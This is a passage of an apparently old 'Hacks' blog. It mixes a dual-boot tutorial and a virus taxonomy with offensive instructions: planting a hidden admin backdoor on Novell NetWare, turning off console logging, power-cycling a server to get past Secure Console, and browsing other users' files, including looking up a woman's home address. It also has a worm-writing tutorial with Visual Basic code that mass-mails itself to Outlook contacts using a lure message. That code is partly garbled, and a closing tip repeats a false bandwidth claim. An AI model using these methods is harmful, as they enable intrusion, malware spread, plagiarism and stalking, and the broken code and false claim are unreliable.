- Get logged in as Admin or equivalent ( Use the Net Plug trick )
- In NWADMIN highlight an existing container.
- Create a new container inside this container.
- Create a user inside this new container. No home directory.
- Give this user full Trustee Rights to their own user object.
- Give this user full Trustee Rights to the new container.
- Make this user security equivalent to Admin.
- Modify the ACL for the new user so they can't be seen.
- Adjust the Inherit Rights Filter on the new container so no one can
see it.

I've not had the chance to really test this in the field. It worked for me but whether or not it won't be detected in the field is another matter. It works fine in theory though.

Okay, now how do I leave a backdoor into the server itself?

This is a lot more difficult because you have to run a program on the server itself. You do this by using the load command. It will automatically load the program from the SYS: directory. You'd have to copy the files to this directory first. Because this dir is filled with NLMs, it will be a lot harder to locate your new program as a rogue. Problem is actually running it. As I said before most Admins run the console logging program called CONLOG. So now what? If we try anything it will be logged won't it? Sure, unless we turn off the logging program first tee hee. Type "unload conlog" without the quotes. This will stop logging console activity. Next type "load magicfile.nlm" with the name of your program and without the quotes. Next type "load conlog" again without the quotes. Loading up conlog is the last thing that you do before leaving the server.
Some Admins run a program called "Secure Console". This stops you from loading any more programs. The only way to get round this is to use the unload command again. However it is password protected. You can get past this too but it will take some guts to do and it will take out the server for a few minutes. Are you ready?

1. Type "Down" at the prompt. If there are any users logged in, it will warn you. Press Y to continue or N to cancel. Pressing Y will cut them off. Any system that is on the Novell network will report to its users that the server is going down. Try to do this at the end of the day when all the clients are turned off or when you've got a chance to reset them before someone sees the message
2. Turn the machine off
3. Wait a few seconds
4. Then turn it on again
5. Run outside and wait for the server to come back up. It is not a good idea to get caught with the server in this state.
6. When the Admins rush in to find out why their precious server bit the dust, their last concern is whether secure console is running or not.
7. When they leave, wait a few minutes before going back in.
8. Go to the console and turn off the console logger
9. Run your nasty little program
10. Turn the logging program back on
11. Walk out of the room as a super user.

The program itself will not show up in the logs ( because you stopped logging before you ran it ). When they shut the server down, the program will not longer be resident. However, if you are taking the risk to run this program, make sure you also run something that will catch the rconsole password. Admins hardly EVER change this. They are far more careful with the NDS password and see no reason why anyone would be able to find or to use their little rconsole password. Once you have the rconsole password you don't really need a backdoor.


Accessing servers drives that you shouldn't be able to see

When you are using Novell, you have your home area mapped as a network drive. You can't press 'Up' to go higher because it will just take you to my computer. How do you get around this and why would you want to?
Well, most Admins don't login to everyone's user account to check that they are set-up correctly ( I know I wouldn't bother going through 1000 different accounts in the unlikely case that one of them is messed up). If they aren't set-up correctly, you might have access to other peoples home areas. Thing is though, how do you get there? You can't see higher than your own directory.
First of all, you have to find out what server you are connected to. This is pretty straight forward. Okay, go back to 'My Computer'. Right click on a network drive and hit properties. It will tell you what server it is mapped on. I'll use GANDALF as an example. My home directory is mapped to F:, however the real location of my home directory is \\gandalf\data1\users\yr12_990\miggyx\ . Now, I wouldn't have known that if I hadn't checked the properties. Admins usually assume you won't know or won't bother looking. The server name directly follows the '\\'. Go to the start menu and select run. Type in the server name. In my example this would be \\gandalf.
What if those pesky Admins have removed the Run command? Not a problem. Minimise all the windows so you are looking at your desktop. Right click and select New -> Shortcut. When asked what it should shortcut to, type in '\\servername'. Press 'Enter' a few times. You should get an icon on your desktop. Click this twice and it will pull up the server. Simple but effective. A word of caution though. Delete the shortcut after use using shift+del. NEVER use just the delete option. If you choose just to delete the file, it will go straight to the recycle bin. Sometimes users don't have access to it and so can't remove the file themselves. This is when those friendly Admins come along and see a nice shortcut to their server with your name on it. Not a good thing to be doing. Shift + Del removes the file directly. This also bypasses any logging software running on the machine itself. The Admins won't be able to get to the file assuming they know it exists in the first place. Best to play it safe.
Once you have access to the server itself ( albeit only as yourself and not as an admin unless your admin is really stupid), you might be able to browse around. For instance, I still had read access to everything in the \\gandalf\data1\users\yr12_990 directory. I could go in a read everyone's work ( although I couldn't write to it) and pass it off as my own. Also, you'll be able to access some of the system directories. In here you'll find useful tools such as rconsole, fconsole nwadmn32.exe and others. Running nwadmn32.exe as yourself only gives you your own rights to the NDS tree. The NDS tree ( Netware directory Service ) contains everything on the entire network. Even if you've got very limited access, you will still see the whole tree. This includes the usernames for the Admins and all the services they are running. You may even have some ability to alter users in your group. It all depends on how your system is configured. Either way it can be a powerful information tool. Usually you can see everything but alter nothing. This is still useful. For instance, say there is this gal you really like and you would kill for her phone number and address. Why go through all the hassle? Most Admins stick all information about a user into their network. It makes sense really. Load up nwadmn32.exe ( they can't restrict this because it would restrict all windows programs and that would be really stupid) find her username and click twice. Bang, you can see all her details. Sure you can't actually alter them but you can read can't you?
You should also be able to happily browse through the directories that you can see. Even if you aren't logged in as an Admin, it is likely you can find some fun files to play around with. If they need DOS access, you'd better log in as an Admin. If you've read the above, you should be able to get Admin status.

______________________________________________________

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

Dual booting is a great way to get started learning Linux. It is also a great way to learn about some deeper issues of Windows. Another great thing about dual booting is that you can learn the intricacies of linux without abandoning your knowldge of Windows. This is a great way to proceed for newbies. Dual booting will allow you to run linux and windows on the same hard drive so that you can have the best of both worlds. Although Linux out-performs Windows on most fronts, we are all consumers and as such we enjoy having some things come easily and effortlessly. Also, Windows tends to have more game selections and better documentation for some software. That said, there is an alternative to dual booting. You can always run WINE or VMWare on your Linux machine. WINE lets you run Windows programs in Linux. VMWare creates another 'layer' in your Linux system and allows you to install any Windows OS within the VMWare program. It has all the functions of a normal Windows box, becuase it is a normal Windows box! You could also run Windows and use VMWare to install Linux within Windows.

This tutoral will assume you have weighed the pros and cons of WINE, VMWare and dual booting and have decided that dual booting is the best for you. I dual boot because when you are running Windows or Linux you get full system resources devoted to that OS whereas emulation programs are running one OS within another so you get much less performance from both when both are running. Of course, when VMWare is not running then the host OS runs normally. WINE has many other technical issues that I do not have time to work through. I can't run Linux exclusively because I work with folks that use Windows and we need to collaborate for development purposes. So dual booting it is.

During this tutorial I am using Windows 2000 SP1 and Slackware.

Step 1.

Load Windows 2000 on the first partition of the drive, if you are using the same drive for both operating systems. If you plan on using 2 hard drives, then put Windows2000 on the primary drive. You need to have the Windows boot sector on the drive that will be looked at first by the BIOS when you turn on the PC. As long as that requirement is met I don’t really care where you load Linux to, so long as you know! NTLDR must reside in your MBR for my method to work properly. You can also replace NTLDR with LILO or another dual OS boot program, that is not covered here.

Step 2.
When Windows 2000 installs it writes to the master boot record (MBR) which then points to a file on the root of the system (the C drive in this instance) called “boot.ini”. The “boot.ini” file points to the location of the files necessary to boot. If you are familiar with Linux and LILO (the LInux LOader) you’ll have an idea of what the “boot.ini” file does, because it acts a little bit like the “lilo.conf” file. Anyways, the “boot.ini” file is what we will be modifying so the windows boot loader knows there is another OS for booting, for now just find it. If you are unable to see it, then you may have “hide system files” turned on. Open an Explorer window, go to the Tools pull down menu and select Folder Options and then the View tab. There you should see radio buttons to Show hidden files and folders, check it, and uncheck Hide protected operating system files (Recommended), hit OK at the bottom and you should now be able to see boot.ini in the root directory.

Step 3.

Install Linux. You can use any distro. You must create a boot disk when the Linux install asks, because we will need to make the boot sector that LILO creates into a file so that the Windows 2000 boot loader can use it to start Linux. And since we are not installing LILO to the MBR (Master Boot Record for those who don’t know), you'll have no way of getting Linux to boot and the long setup process will be for nothing. The alternative is to install to the first sector of the Linux partition. I tend to do both. If you load LILO to the first sector of the patition then you can use a boot program to point to NTLDR and LILO and allow you to choose which you want to boot from. This is the method I use. Also, if something goes wrong in this setup then you have LILO on disk and you can always boot from a:\ and you will have Linux.

Step 4.

Quick Review: Windows2000 Pro is installed, Linux is installed and LILO is installed! Our next step is to extract the Linux boot sector and get it to Windows. I find it easiest to just copy the boot sector to a floppy disk, boot into Windows and copy it off the floppy. Boot into Linux by placing your LILO boot disk into your floppy and booting to a:\. You will first need to get the boot sector onto a floppy, to do that you must mount the floppy disk. To mount the floppy drive in Linux type the following command “mount –t msdos /mnt/floppy”. It is likely that the floppy is already mounted since you did just boot from it. Insert a DOS formatted floppy so that we can copy the LILO boot sector file to it once the file is created. The following command will copy the LILO boot sector to a file that is 512 bytes big, right to the floppy and called “linux.bin” Don’t forget to put a DOS formatted floppy in the drive! “dd if=/dev/hda5 bs=512 count=1 of=/mnt/floppy/linux.bin”






Step 5.

That should do it for the Linux part of this project. Remove the floppy and boot into Windows2000 normally. Go to “Windows Explorer” and copy the file, “linux.bin”, off the floppy to the root of your Windows2000 drive [c:\]. Next, open “boot.ini” file in “Notepad” and add the line c:\linux.bin=”Slackware (or whatever)” to the end of the file, save it and you are done.

Step 6.

Reboot without any floppies in the drive and you should be able to choose which OS you want to boot into! If you have gone and turned off the display of other operating systems, you will need to turn that back on. If you don’t know how or don't remember, right click on “My Computer”, click on “Properties”. This brings up the “System Properties” window, click on the “Advanced” tab and then the “Startup and Recovery” button at the bottom. You should see the first check box unchecked, simply put a check in the box and then set the number of seconds the display is up before booting into the default OS!

Step 7. Oh Shit!

So things were going well but when you rebooted there was no OS option. Well, good thing we have a back-up plan. Assuming you followed all the instructions above, you now have a LILO boot disk. If worse comes to worse you can always set your boot sequence in BIOS to a:\ c:\ to check whether LILO is in your drive. If that is not good enough, and modifying boot.ini did not work for you but you did place LILO to the first sector of its partition, then there is one more option. You can use a boot manager. My favorite is XOSL, but there are many to choose from. Do a search for boot manager, download the one you like, read the documentation and go to town. You want to find one that will not make you do anymore partitioning. Boot managers scan your drive and find all your boot loaders, in this case LILO and NTLDR and then allow you to choose which to use at start-up. The boot manager you use is up to you.

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

Writing a worm tool :)

A Worm is a simple and easy program that can spread by itself to other machines. What is the diffrence between a
Worm and a Virus? A Virus is a Program that can infect documents but must be sent by a person to be able to
spread. A worm can spread itself by Email and it can spread itself at anytime. A Worm can be made in any
Programming Language avaliable. Some of the programming Languages I would prefer to make a worm are:

-Visual Basic
-C++
-Delphi
-Javascript
-Visual Basic Scripting

These Languages can all be used ot make worms. Easier languages like Batch can also be used to make worms.
The worm has one mail goal and that goal is to spread to another Machine. Some of the many ways of spreading
include:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits


These can all be used to spread a file to another machine. I usually use the Email, Binary Injection and File Sharing
Methods to spread my Worm. I am going to show you how to make a Worm in Visual Basic. Visual Basic is easy to
learn and is a begginer Language. What is nice about Visual Basic is once you have mastered it you are ready to
move up to a higher language such as C++. Visual Basic and Delphi are the same accept for one major diffrence.
That diffrence is that Visual Basic requires the Runtimes Files to run when Delphi dosent. You can download and
crack programs such as www.Thinstall.com or www.Winzip.com and have your worm drop the runtime files. If your
worm is in Visual Basic.

Now the 1st thing we are going to do is show you what our worm we are going to create is going to preform. The
worm we are going to create is w32.N00bie. This worm is not very powerfull but is good for the beginner. To be able
to create this worm you will need Microsoft Visual Basic. Visual Basic is a RPD or Rapid Application Builder. We
will now begin to make our 1st program in Visual Basic. Open up Visual Basic and select a Standrad .exe Program.
Now, Visual Basic will load a Windows that is titled "Form1" This is the main form for Visual Basic. This is your
worm. Double click on the window labeld "form1" and you will see the below text

Private formsub_load()


End Sub

You will be coding between this text. (Image One shows a example of where you will be coding)



The 1st thing you will do is hide your worm. A worm must have stealth in order to be considered a "Real" Worm.
One way you can hide any Window in Visual Basic is the below code

Form1.Visible = False

That above code will make form1 Invisible Or you could do this

Me.hide

So, Now let's add Me.Hide into our code. So, the code in Visual Basic should now look like the below.

Private Sub form_Load()
Me.Hide
End Sub

Now So far the only thing your worm will do is Hide itself from the user. So, Now let's make the worm's heart. Now
I said above a worm must do SOME the following things:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits

In this worm we are going to do Emailing, File Shareing and we will also do some DDoS Attacks and More with the
worm on a certain date. So, the 1st thing we want our worm to do is copy itself somewhere on the machine. Why you
may ask? This is a Good Question. The reason why is let's say that the worm is launched in the email attachment
but some how it is deleted when the user restarts. Well, With a copy of the worm on the machine there is always a
good chanche that the worm will be activated again. So Let's have the worm copy itself a few times on the system.
So, This is the code to copy itself to other places on the machine. When I say Copyiteself I mean Like Making a
Exact Copy of itself to another location with a diffrent name. So, We are going to make this sample worm copy
itself to the C:\ Drive using The following File Names:

C:\Worm1.exe
C:\InnocentFile.exe
C:\Me.exe
C:\OpenMe!.exe

So, In Visual Basic in order to have it copy itself with those file names to the c:\ drive we would have to enter the
following code. If you study the code you will understand what it means. I have explained the code alittle better
below.

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

Now what does this code mean piece by piece? I will explain it as best I can below:

Filecopy - This means copy a file.

App.Path + - This Means it will copy the Applications Path

"\" - This is hard to explain. You know how when you are typing a location like C:\ and you see the \? Well in this
code with out the "\" it would look like this C: Windows Desktop Worme.exe So we have to add this in "\" to get it
to look like C:\Windows\Desktop\Worme.exe

App.EXEname + - This means that it's going to make a copy of the Applications Original .Exe Name

.exe - File extenstion

Then after the location of the file has been selected you need to tell Visual Basic where to copy the worm to. So,
You see the last part of this code (The Part In Bolad)

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

This is where we will specify where we want a copy of the worm to be copied to. So If you changed the last part of
the code to C:\Windows\Openme!.exe it would make a copy of the worm to C:\Windows\Openme!.exe

Now, I hope I havent confused you alot. If I have I am sorry! Lol Anyway Your Visual Basic code should now
look like this

Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
End Sub

So Now you have your worm doing the following actions

Hiding itself from the user (Stealthing itself)
Copying a Exact Copy of itself to C:\Worm1.Exe, C:\Innocentfile.exe, C:\Me.exe, C:\Openme.exe

Now, let's make your worm spread. Now, The easiest way for a worm to spread is Via-Email. Email is the #1
Spreading Method of a Internet Worm. So, Now let's add the email code into this program.

(Note: For the email code to work you will need to add a Windows Scripting Control into your program. If you don't
then your worm will not preform the email task. You add a WSC the same way you add a Winsock Control)

Now Add this Visual Basic Scripting code into your program's code:

Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit

Now your worm emails itself. I want to let you know that when you compile the Visual Basic code that this Vbs
Code may give you a error. Well, If it does Delete any code that gives you the error. It's usually the 1st Set
So=CreateObject(fso) if this occurs just delete it and then try recompileing. It should work. If it dosent
troubleshoot and you will manage to fix the problem! Anyway, Your Visual Basic code should now look like this


Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit
End Sub

Now you have a Worm! How is this a worm? A worm is a file that can email itself, Infect other computers with out
having to have a person email the file the worm will do it by itself.


TYPES OF WORMS

Overwrite Method - This is the Quickest Method for making a worm infect documents on the machine. It will overwrite them. It's like this. Each Windows Computer has a C:\Windows\Defrag.exe , So your worm will do this it will copy itself as c:\windows\defrag.exe

Binary Infection - This Method is not easy! Binary is hard for newbies. Binary Infection is where a worm made in anylanguage (YES, IT IS POSSIABLE IN BATCH) to infect a Document's binary. Let's use disk defragger again. We know all windows computers has c:\windows\defrag.exe so, our worms will open up the binary (The binary is like the DNA of a File. It controls the body. It's like it's Genetic code) and it will copy the worms binary to the end or beggining of the c:\windows\defrag.exe's binary. This means that each time disk defragger is ran the worm is running with it inside of defrag.exe! This is a hard process to configure.

Injection into a Process - Injection is like this. You know how you go to the dr's office and you get a shot? Well, let's say you went in for a TD shot (Tectnus-DIFFERIHIA) shot. This shot will actually inject "Dead" Bactieria of the Disease into your body so that the immune system can look at it and make a antidote. Well, Injection does the same thing. It shoots the virus into a running process or into a file. Its rather hard to explain. This is another way a worm can spread.

Resident Viruses

This type of virus hides permanently in the RAM memory. From here it can control and intercept all of the operations carried out by the system: corrupting files and programs that are opened, closed, copied, renamed etc.

Resident viruses can be treated as file infector viruses. When a virus goes memory resident, it will remain there until the computer is switched off or restarted (waiting for certain triggers to activate it, such as a specific date and time). In the meantime it sits and waits in hiding, unless of course an antivirus can locate and eliminate it.

Examples include: Randex, CMJ, Meve, MrKlunky.



Direct Action Viruses

The principal aim of these viruses is to replicate and take action when they are executed. When a specific condition is met, the virus will go into action and infect files in the directory or folder that it is in and in directories that are specified in the AUTOEXEC.BAT file PATH. This batch file is always located in the root directory of the hard disk and carries out certain operations when the computer is booted.

Files infected with this type of virus can be disinfected, and completely restored to their original condition.



Overwrite Viruses

This type of virus is characterized by the fact that it deletes the information contained in the files that it infects, rendering them partially or totally useless once they have been infected.

Infected files do not change size, unless the virus occupies more space than the original file, because instead of hiding within a file, the virus replaces the files content.

The only way to clean a file infected by an overwrite virus is to delete the file completely, thus losing the original content.

Examples of this virus include: Way, Trj.Reboot, Trivial.88.D.



Boot Virus

This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk.

This kind of virus does not affect files, but rather the disks that contain them. First they attack the boot sector of the disk then, once you start your computer, the boot virus will infect the hard drive of your computer.

The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive.

Some examples of boot viruses include: Polyboot.B, AntiEXE.



Macro Virus

Macro viruses infect files that are created using certain applications or programs that contain macros. These include Word documents (DOC extensions), Excel spreadsheets (XLS extensions), PowerPoint presentations (PPS extensions), Access databases (MDB extensions), Corel Draw etc.

A macro is a small program that a user can associate to a file created using certain applications. These mini-programs make it possible to automate series of operations so that they are performed as a single action, thereby saving the user from having to carry them out one by one.

When a document containing macros is opened, they will automatically be loaded and may be executed immediately or when the user decides to do so. The virus will then take effect by carrying out the actions it has been programmed to do, often regardless of the program's built-in macro virus protection.

There is not just one type of macro virus, but one for each tool: Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Microsoft Access, Corel Draw, Lotus Ami Pro, etc.

Some examples of macro viruses: Relax, Melissa.A, Bablas, O97M/Y2K.



Directory Virus

An operating system finds files by looking up the path (composed of the disk drive and directory) in which each file is stored.

Directory viruses change the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus.

Once infected it becomes impossible to locate the original files.



Encrypted

Encryption is a technique used by viruses so that they cannot be detected by antivirus programs.

The virus encodes or encrypts itself so as to be hidden from scans, before performing its task it will decrypt itself. Once it has unleashed its payload the virus will then go back into hiding.

Examples of encrypted viruses include: Elvira, Trile.



Polymorphic Virus

Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system.

This makes it impossible for antiviruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves.

Some examples include: Elkern, Marburg, Satan Bug, Tuareg.



Multipartite Virus

These advanced viruses can create multiple infections using several techniques. Their objective is to attack any elements that can be infected: files, programs, macros, disks, etc.

They are considered fairly dangerous due to their capacity to combine different infection techniques.

Some examples include: Ywinz.




File Infectors

This type of virus infects programs or executable files (files with an .EXE or .COM extension). When one of these programs is run, directly or indirectly, the virus is activated, producing the damaging effects it is programmed to carry out. The majority of existing viruses belong to this category, and can be classified depending on the actions that they carry out.



Companion Viruses

Companion viruses can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they "accompany" the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses).

Some examples include: Stator, Asimov.1539, Terrax.1069



FAT Virus

The file allocation table or FAT is the part of a disk used to connect information and is a vital part of the normal functioning of the computer.

This type of virus attack can be especially dangerous, by preventing access to certain sections of the disk where important files are stored. Damage caused can result in information losses from individual files or even entire directories.



Worms

A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antiviruses. However, worms are not strictly viruses, as they do not need to infect other files in order to reproduce.

Worms can exist without damaging files, and can reproduce at rapid speeds, saturating networks and causing them to collapse.

Worms almost always spread through e-mail, networks and chat (such as IRC or ICQ). They can also spread within the memory of a computer.

Some examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson.



Trojans or Trojan Horses

Another unsavory breed of malicious code are Trojans or Trojan horses, which unlike viruses do not reproduce by infecting other files, nor do they self-replicate like worms.

Trojans work in a similar way to their mythological namesake, the famous wooden horse that hid Greek soldiers so that they could enter the city of Troy undetected.

They appear to be harmless programs that enter a computer through any channel. When that program is executed (they have names or characteristics which trick the user into doing so), they install other programs on the computer that can be harmful.

A Trojan may not activate its effects at first, but when they do, they can wreak havoc on your system. They have the capacity to delete files, destroy information on your hard drive and open up a backdoor to your system. This gives them complete access to your system allowing an outside user to copy and resend confidential information.

Some examples of Trojans are: IRC.Sx2, Trifor.




Logic Bombs

They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs.

Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive.



False Viruses

These messages are often confused for viruses but are something else entirely. It is important to know the difference between a real virus threat and a false virus.

Hoaxes are not viruses, they are false messages sent by e-mail, warning users of a non-existent virus. The intention is to spread rumors causing panic and alarm among users who receive this kind of information.

Occasionally, hoax warnings include technical terms to mislead users. On some other occasions, the names of some press agencies are mentioned in the heading of the warnings. In this way, the hoax author attempts to trick users into believing that they have received a warning about a real virus. Hoaxes try to fool the user into performing a series of actions to protect themselves from the virus, sometimes leading to negative results.

Users are advised not to pay attention to these misleading warnings and delete these messages once received without sending them to others.

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc ..

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy
then Computer Configuration
then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.

Labels: Hacks

BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb